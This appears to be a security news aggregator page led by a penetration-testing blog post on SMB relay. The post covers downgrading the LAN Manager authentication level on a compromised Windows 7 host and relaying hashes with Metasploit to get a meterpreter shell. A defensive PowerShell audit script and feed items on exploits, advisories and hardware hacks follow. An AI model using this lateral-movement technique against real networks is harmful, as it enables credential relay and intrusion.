Carnal0wnage
Lately we have had a number of posts about our training classes, and I said I would put something technical up on the blog. In one of our classes, we teach students how to think like real bad guys and think beyond exploits. We teach how to examine a situation, how to handle that situation, and then how to capitalize on that situation. Recently on an engagement, I had to figure out how to exploit a domain-based account that could log into all Windows 7 hosts on the network, but there were network ACLs in place that prohibited SMB communications between the hosts. So, I turned to SMB relay to help me out. This vulnerability has plagued Windows networks for years, and with MS08-068 and NTLMv2, MS started to make things difficult. MS08-068 won't allow you to replay the hash back to the initial sender and get a shell, but it doesn't stop you from being able to replay the hash to another host and get a shell, at least as long as the host isn't speaking NTLMv2! By default, Vista and up send an NTLMv2 response only for the LAN Manager authentication level. This becomes problematic in newer networks, as seen in this screenshot from my first attempt to do SMB relay between two Windows 7 hosts:

In this scenario, we have host 192.168.0.14, which I have compromised, and I have discovered that the domain account rgideon can probably authenticate into all Windows 7 hosts. We have applied unique Windows-based recon techniques that we teach in our class to determine this. We see that 192.168.0.13 is also a Windows 7 host, and we will look to authenticate into it, but we can't do it from the .14 host. There is a firewall between .13 and .14; so instead, we will attempt to do SMB relay with host 192.168.0.15 as the bounce host.
So, what can we do in this scenario? We don't teach much visual hacking in any of our classes, so everything must be done using shells, scripts, or something inconspicuous. In this situation, I did some research into the LAN Manager authentication protocol. I found a nice little registry key that doesn't exist by default in Vista and up, but if we put the registry key in place, then the LAN Manager authentication settings listen to the registry key. This happens on the fly; there are no reboots, logons/logoffs, etc. There is a caveat with this! You have to have administrator privileges on the first host! This scenario is about tactically exploiting networks and doing this the smart way.
Since we have a shell on our first host (192.168.0.14) and we have gotten it by migrating into processes, stealing tokens, etc., we can move a reg file with the following contents up to the first host.

This registry key is targeting the following path:
HKLM\SYSTEM\CurrentControlSet\Control\Lsa. If we drop in a new DWORD value of 00000000, this will toggle the LAN Manager authentication level down to the absolute minimum, which will send LM and NTLM responses across the network. Now that we have the LAN Manager authentication value set as low as it will go, we can capitalize on this.
Open a Metasploit console (you will need admin privileges) on the host that will be set up as the bounce-through host (192.168.0.15). In your msfconsole, use the exploit smb_relay and whatever payload you choose. I have chosen to use a reverse_https meterpreter. The screenshot below is an example of my settings:

Once all your settings are selected, exploit and get ready for the hard part. We need to get this account to attempt authentication to our bounce-through host with LAN Manager authentication. SMB relay in this setting is probably best used by getting the account you are targeting to visit your malicious host (192.168.0.15) through a UNC path (\\mybadhost\share). Getting a user to do this is not something we will go into in this post. We reserve that type of thing for teaching in the class, but we have used this tactic, coupled with a few others, to compromise almost a whole Windows domain.
For brevity's sake, we will just go ahead and simulate this activity by simply typing the following in the Run dialog box on the first victim host (192.168.0.14): \\192.168.0.15\share\image.jpg.

I am not really hosting anything as a share on my host. I just need the LAN Manager authentication process to attempt authentication to my host (192.168.0.15). This authentication attempt actually happens even by just typing \\192.168.0.15. With just the IP address entered, you will see authentication attempts to your host, but for large-scale attacks, or something along those lines, it is best to have a full UNC path. Once the rgideon account on host 192.168.0.14 starts authentication requests to our relay host 192.168.0.15, things will actually look as though they are being denied by the end host 192.168.0.13:

As you can see, we are receiving LAN Manager authentication requests from 192.168.0.14 and attempting to relay them to 192.168.0.13, but it looks as though they are being denied. This is a false negative. Type sessions -l in your Metasploit console, and you will see that you have a meterpreter session on 192.168.0.13.
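For the defensive side of the same two settings, here is an added audit script (not from the Carnal0wnage post) that reads a host's LAN Manager authentication level, the DWORD the post drops to 0, and whether SMB signing is required, the setting that makes relayed authentication fail. The value names LmCompatibilityLevel and RequireSecuritySignature are the standard Windows ones; the post shows them only in a screenshot.

```powershell
# Added audit script; it is not part of the Carnal0wnage post.
# Reads the registry settings behind "LAN Manager authentication level" and
# "Digitally sign communications (always)" so a defender can spot the
# downgrade described above and confirm the relay mitigation is in place.
# Value names are the standard Windows ones (not spelled out on the page).

$lsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$srvKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$wksKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters'

function Get-DwordValue {
    param([string]$Path, [string]$Name)
    # Returns $null when the value (or key) is absent. An absent
    # LmCompatibilityLevel is the Vista+ default, as the post describes.
    $props = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $props) { return $null }
    return [int]$props.$Name
}

function Format-Setting {
    param($Value)
    if ($null -eq $Value) { return 'absent' }
    return $Value.ToString()
}

$level   = Get-DwordValue -Path $lsaKey -Name 'LmCompatibilityLevel'
$srvSign = Get-DwordValue -Path $srvKey -Name 'RequireSecuritySignature'
$wksSign = Get-DwordValue -Path $wksKey -Name 'RequireSecuritySignature'

$findings = @()

# Levels 0-2 send LM and/or NTLM responses; 3 and above send NTLMv2 only,
# which is the out-of-the-box behaviour on Vista and later.
if ($null -ne $level -and $level -lt 3) {
    $findings += "LmCompatibilityLevel is $level (explicitly lowered): LM/NTLM responses will be sent"
}

# A relayed session is rejected by a server that requires SMB signing,
# so both the server and workstation side should be set to 1.
if ($srvSign -ne 1) {
    $findings += "SMB server signing not required (RequireSecuritySignature=$(Format-Setting $srvSign))"
}
if ($wksSign -ne 1) {
    $findings += "SMB client signing not required (RequireSecuritySignature=$(Format-Setting $wksSign))"
}

Write-Host "Host: $($env:COMPUTERNAME)"
Write-Host "  LmCompatibilityLevel           : $(Format-Setting $level)"
Write-Host "  LanmanServer signing required  : $(Format-Setting $srvSign)"
Write-Host "  LanmanWorkstation signing req. : $(Format-Setting $wksSign)"

if ($findings.Count -eq 0) {
    Write-Host 'OK: no relay-friendly settings found'
} else {
    Write-Host 'Findings:'
    $findings | ForEach-Object { Write-Host "  - $_" }
}
```

Run it in an elevated PowerShell on each host; Group Policy writes these same registry values, so the reading reflects the effective policy on that machine.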

This is a simple demonstration and exploit that we teach in some of our offensive-based classes. Our Offensive Techniques class is based on showing people real-world attacks coupled with unique approaches to compromising both Windows and Unix infrastructures. Offensive Techniques has various sections covering techniques we have seen used in APT attacks, and the class also includes custom techniques built and used by Attack Research.
The goal of our training is to get you out of the mindset of traditional pen testing and show students how real offensive attacks actually happen. We are hoping these types of concepts spread to the whole industry. When this happens, we will be able to make an impact at the business level on how companies, governments, etc., make decisions based upon real security threats and a true security landscape. If you are interested in the training that we released yesterday, or have questions, please visit our site or email us at training@attackresearch.com.
R.
Packet Storm Security Exploits
Sites designed by Site2Host.com suffer from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
Hack a Day
For being such a revolutionary device, there are still a few problems with the Raspberry Pi. For one, the USB host ports are only able to source 140 mA per port, while the USB ports on your desktop, laptop, and even tablet are able to send a full 500 mA per port. The official ‘fix’ [...]
Packet Storm Security Advisories
Red Hat Security Advisory 2012-1234-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. qemu-kvm is the user-space component for running virtual machines using KVM. A flaw was found in the way QEMU handled VT100 terminal escape sequences when emulating certain character devices. A guest user with privileges to write to a character device that is emulated on the host using a virtual console back-end could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host. This flaw did not affect the default use of KVM.
Packet Storm Security Advisories
Red Hat Security Advisory 2012-1233-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. The qemu-kvm-rhev packages form the user-space component for running virtual machines using KVM. A flaw was found in the way QEMU handled VT100 terminal escape sequences when emulating certain character devices. A guest user with privileges to write to a character device that is emulated on the host using a virtual console back-end could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host. When using qemu-kvm-rhev on a Red Hat Enterprise Linux 6 host not managed by Red Hat Enterprise Virtualization:
Packet Storm Security Exploits
Sites powered by code from 120host.net appear to suffer from a cross site scripting vulnerability. Note that this finding houses site-specific data.
Hack a Day
Joining the pantheon of other RepRap host software packages such as ReplicatorG, RepSnapper, and Skeinforge is Yet Another RepRap Host, a project by [Arkadiusz] that combines a lot of neat features into a very cool package. One thing we’ve really got to give [Arkadiusz] credit for is a virtual table that allows you to import several .STL files, place [...]
SecuriTeam
phpMyAdmin is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input.
Packet Storm Security Recent Files
This program uses multithreading to scan a range of IP addresses (IPv4) to find telnet/ssh and web servers. It then brute forces credentials against the host and upon success, will detect the type of host and execute commands.
Packet Storm Security Advisories
Red Hat Security Advisory 2012-0676-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. KVM is a Linux kernel module built for the standard Red Hat Enterprise Linux kernel. A flaw was found in the way the KVM_CREATE_IRQCHIP ioctl was handled. Calling this ioctl when at least one virtual CPU already existed could lead to a NULL pointer dereference later when the VCPU is scheduled to run. A malicious user in the kvm group on the host could use this flaw to crash the host. A flaw was found in the way device memory was handled during guest device removal. Upon successful device removal, memory used by the device was not properly unmapped from the corresponding IOMMU or properly released from the kernel, leading to a memory leak. A malicious user in the kvm group on the host who has the ability to assign a device to a guest could use this flaw to crash the host.
Packet Storm Security Recent Files
Ubuntu Security Notice 1442-1 - It was discovered that sudo incorrectly handled network masks when using Host and Host_List. A local user who is listed in sudoers may be allowed to run commands on unintended hosts when IPv4 network masks are used to grant access. A local attacker could exploit this to bypass intended access restrictions. Host and Host_List are not used in the default installation of Ubuntu.
Hack a Day
[ften] was having plenty of fun running Android on his HP Touchpad, but he soon discovered that the tablet’s micro USB port didn’t provide enough juice to his peripherals when running in host mode. He started digging around and found the perfect means of providing the extra power while maintaining the device’s stock appearance. He [...]
Packet Storm Security Misc. Files
Joomla version 2.5.3 suffers from a host header cross site scripting vulnerability.
Packet Storm Security Misc. Files
IPv6 offers a much larger address space than its IPv4 counterpart. The standard /64 IPv6 subnets can (in theory) accommodate approximately 1.844 * 10^19 hosts, resulting in a much lower host density (#hosts/#addresses) than their IPv4 counterparts. As a result, it is widely assumed that it would take a tremendous effort to perform host scanning attacks against IPv6 networks, and therefore IPv6 host scanning attacks have long been considered unfeasible. This document analyzes the IPv6 address configuration policies implemented in the most popular IPv6 stacks, and identifies a number of patterns in the resulting addresses that lead to a tremendous reduction in the host address search space, thus dismantling the myth that IPv6 host scanning attacks are unfeasible.
Packet Storm Security Exploits
This Metasploit module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result in a stack-based buffer overflow when a specially crafted packet is sent on a network that is monitored by Snort. Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. Any host on the Snort-monitored network may be used as the remote host. The remote host does not need to be running the SMB service for the exploit to be successful.
Packet Storm Security Headlines
If I had a quarter every time someone contacted us saying "look what I've hacked, please let the world know", I would probably have... well, let's just say I probably wouldn't have to work for a few weeks. It's rare that a compromise impresses me. It's not to say that it doesn't take special talent to commit the offense, it's just that such offenses are pretty commonplace and usually have poor motives. Truth is, on a long enough timeline and with the right resources, anything can be compromised. Even when someone bumps a power cord and causes our systems to reboot, my nerves shatter to a point that our forensic investigation over the matter can turn into a quagmire worse than a congressional hearing into fraud on Wall Street. This evening I received some tweets to our account noting that 22 sites on Dream Host have been compromised. Considering the sites are not well known, it is not really that significant nor something we would normally publish an article over. However, I spent five seconds looking over the pastebin and noticed something interesting. The sites in question are primarily tax or fiscal related. If I was a betting man, I would venture to guess that all of these sites are sharing the same vulnerable third-party software to run their business. So, if you are on the list at , I strongly suggest you look at what third-party code you have installed and reinstall your OS, shelve the turn-key solution, and take the time to write code that keeps your system and your users secure.
Hack a Day
With the coming of Android 3.1 you finally have the option of using the device as a USB host. This may be through a USB OTG (On-the-Go) adaptor, but nonetheless it’s a feature which was sorely missed until now. [Manuel] put together a guide on using Android as a USB host. As you can see, [...]
Sophos security news
Sophos and world-renowned cryptographers host free workshops on cutting-edge cryptographic solutions at RSA Conference 2012
Packet Storm Security Advisories
Red Hat Security Advisory 2012-0051-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. KVM is a Linux kernel module built for the standard Red Hat Enterprise Linux kernel. A heap overflow flaw was found in the way QEMU-KVM emulated the e1000 network interface card. A privileged guest user in a virtual machine whose network interface is configured to use the e1000 emulated driver could use this flaw to crash the host or, possibly, escalate their privileges on the host. A flaw was found in the way the KVM subsystem of a Linux kernel handled PIT IRQs when there was no virtual interrupt controller set up. A malicious user in the kvm group on the host could force this situation to occur, resulting in the host crashing.
Packet Storm Security Advisories
Red Hat Security Advisory 2011-1801-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. qemu-kvm is the user-space component for running virtual machines using KVM. A flaw was found in the way qemu-kvm handled VSC_ATR messages when a guest was configured for a CCID USB smart card reader in passthrough mode. An attacker able to connect to the port on the host being used for such a device could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host.
Packet Storm Security Advisories
Red Hat Security Advisory 2011-1777-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. qemu-kvm is the user-space component for running virtual machines using KVM. A flaw was found in the way qemu-kvm handled VSC_ATR messages when a guest was configured for a CCID USB smart card reader in passthrough mode. An attacker able to connect to the port on the host being used for such a device could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host.
Carnal0wnage
Need to check a few specific Nessus plugins against a host?
$ sudo ./nessuscmd 192.168.1.92 -p80,443 -v -V -i 38157,10107
Starting nessuscmd 4.4.0
Scanning '192.168.1.92'...
Host 192.168.1.92 is up
Discovered open port http (80/tcp) on 192.168.1.92
[i] Plugin 10107 reported a result on port http (80/tcp) of 192.168.1.92
[i] Plugin 38157 reported a result on port http (80/tcp) of 192.168.1.92
+ Results found on 192.168.1.92
+ - Port http (80/tcp) is open
[i] Plugin ID 38157 Synopsis :
The remote web server contains a document sharing software Description : The remote web server is running SharePoint, a web interface for document management. As this interface is likely to contain sensitive information, make sure only authorized personel can log into this site See also :
http://www.microsoft.com/Sharepoint/default.mspx Solution : Make sure the proper access controls are put in place
Risk factor : None
Plugin output : The following instance of SharePoint was detected on the remote host :
Version : 12.0.0.6327
URL : http://192.168.1.92/
It looks like the functionality has been there for a while:
http://blog.tenablesecurity.com/2007/07/nessus-32-beta-.html
SecDocs
Authors: Christiaan Schade, Damiano Bolzoni
Tags: malware, malware analysis
Event: Black Hat USA 2010
Abstract: In this presentation we will show a new approach to perform on-the-fly malware analysis (even of previously unknown malware), without the need to deploy any instrumentation at the end host beforehand. Our approach leverages the fact that malware quite often comes as a small (in size) "spore", which is then responsible for making the malware persistent on the targeted host and downloading additional components ("eggs"). Eggs usually come in the shape of executables or DLLs, and extend the capabilities of the spore (password grabbing, URL redirection, etc.). Our system, which we call Avatar, detects failed attempts to download eggs and ships back to the suspected malware what we call a "red pill". When the malware executes the red pill, it performs some preliminary checks and can send a copy of the parent process' executable to an instrumented host. In this instrumented (i.e., sand-boxed) environment it is possible to perform real-time analysis of the suspicious program. The red pill can then be remotely instructed to terminate the monitored process in case it appears to be a real threat. By doing so, it is possible to effectively contain a large infection.
19:32
Packet Storm Security Exploits
Microsoft Host Integration Server versions 8.5.4224.0 and below suffer from various denial of service vulnerabilities. Proof of concept code included.
16:39
Packet Storm Security Recent Files
Monocle is a local network host discovery tool. In passive mode, it will listen for ARP request and reply packets. In active mode, it will send ARP requests to the specific IP range. The results are a list of IP and MAC addresses present on the local network. Written to work on both Linux and FreeBSD.
22:27
Packet Storm Security Exploits
The WordPress x7Host's Videox7 UGC plugin version 2.5.3.2 suffers from a reflected cross site scripting vulnerability.
14:49
Packet Storm Security Exploits
Objectivity/DB includes many different tools for administration. The problem is, anyone can use these tools to perform operations on the host running the lock server, advanced multithreaded server, and probably its other servers as well, without any authentication. This design flaw puts the host running these servers at risk of potentially unauthorized operations being performed on the system, locally or remotely. This exploit demonstrates this issue and was tested on Objectivity/DB 10 running on Windows.
23:02
Packet Storm Security Recent Files
Ubuntu Security Notice 1008-1 - It was discovered that libvirt would probe disk backing stores without consulting the defined format for the disk. A privileged attacker in the guest could exploit this to read arbitrary files on the host. This issue only affected Ubuntu 10.04 LTS. By default, guests are confined by an AppArmor profile which provided partial protection against this flaw. It was discovered that libvirt would create new VMs without setting a backing store format. A privileged attacker in the guest could exploit this to read arbitrary files on the host. This issue did not affect Ubuntu 8.04 LTS. In Ubuntu 9.10 and later guests are confined by an AppArmor profile which provided partial protection against this flaw. Jeremy Nickurak discovered that libvirt created iptables rules with too lenient mappings of source ports. A privileged attacker in the guest could bypass intended restrictions to access privileged resources on the host.
9:21
Hack a Day
This USB to Zipit Dock adapter and a special kernel makes USB host mode for the Zipit possible. Previously, the cheap and hackable wireless client needed a hardware modification to enable USB support. The new kernel bootloader, called U-Boot, makes the internal alterations unnecessary (see the demo after the break). Now the only caveat is one [...]
12:00
Hack a Day
[Deadbird] decided to use a LEGO 8880 Super Car as a host for all of his electronic tinkering. Throughout his blog (translated) you’ll find the vehicle with an Arduino MEGA interfacing various prototyping bits. It starts with the motors for locomotion, closely followed by a servo for steering. From there we see the addition of [...]
20:34
Packet Storm Security Recent Files
The Symantec Antivirus Corporate Edition AMS Intel Alert Handler service (hndlrsvc.exe) provides alert setup and response capabilities to AMS2. A design error in Symantec's implementation of this function allows an attacker who can establish a TCP connection to port 38292 on a vulnerable host to execute commands at system level on that host. Versions 10.1.8.8000 and below are affected.
9:00
Hack a Day
[Sven Killig] has managed to get his Nexus One into USB host mode. This allows him to plug in all kinds of peripherals such as web cams, keyboards, even a DisplayLink unit. This is fantastic as it really opens up the possibilities of this device. You can see that he now has an amazingly functional [...]
12:00
Hack a Day
[Simon Inns] is still hard at work making USB connectivity for PIC microcontrollers easier for the hobbyist. He’s released a framework for PIC based USB devices under Windows. It includes the firmware needed for USB compatible 18F PIC chips as well as a C# class library and example programs for the Windows side of things. [...]
9:32
Hack a Day
[Micah Dowty] has implemented full speed USB host control on a Propeller microcontroller. He’s motivated by the thought of using USB based WiFi and Bluetooth dongles in his projects as ready-made solutions. We’ve seen USB host control with the Arduino and it really opens up the flood gates for advancing your projects through storage, wireless connectivity, [...]
15:00
Packet Storm Security Tools
Known Host Cracker (khc) is a small tool designed to recover hashed known_hosts files back to their plain-text equivalents.
22:19
remote-exploit & backtrack
I have been out of the loop for about a year now. About 20 min ago I installed BT4 on VM player 3.0.1. Everything seems to work fine. Sadly I have been damned to Windows 7 as a host OS at work. I would like to use the LAN eth0 for surfing on the host OS (Windows 7) while I am using BT4 final in the VM using my Alfa AWUS036H 500mW to connect to another AP. For some reason BT inherits the host IP. I take it this has something to do with NAT. Anybody know how this is fixed?
11:17
remote-exploit & backtrack
Hi,
Is it possible to use the autopwn function to check a host if it would be possible to be exploited without exploiting it?
Or is there any other way to check a host against all exploits from Metasploit without compromising the host?
11:00
Hack a Day
There’s a simple hack to use your Motorola Droid phone as a USB host. It is a hardware-only hack that doesn’t require you to crack open your phone, root it, or even to change firmware (although device drivers in the stock Android image may be quite limited). The dongle above is used as a key [...]
18:56
remote-exploit & backtrack
I have a training lab setup and I am having trouble trying to double pivot. I have a firewall showing an FTP server through, I have exploited the FTP server, scanned internally, found some hosts. Set up a pivot through the FTP server and exploited a host; this host has a second NIC and another host behind it. I have set up another route through the host but I cannot get any of my exploits to work against the second host.
Just wondering if anyone has done this before, or if it is even possible to double up pivots.
If needed I can give more details, IPs and such...
Thanks for any help
11:41
Hack a Day
[I-Bot] has put together some libraries that make it easy to use gaming controllers with an Arduino. They interface through the USB host shield. This means that PS3 controllers connect via USB through a cable or a dongle. With the Wii remote things get a little more interesting. A Bluetooth dongle is used to make [...]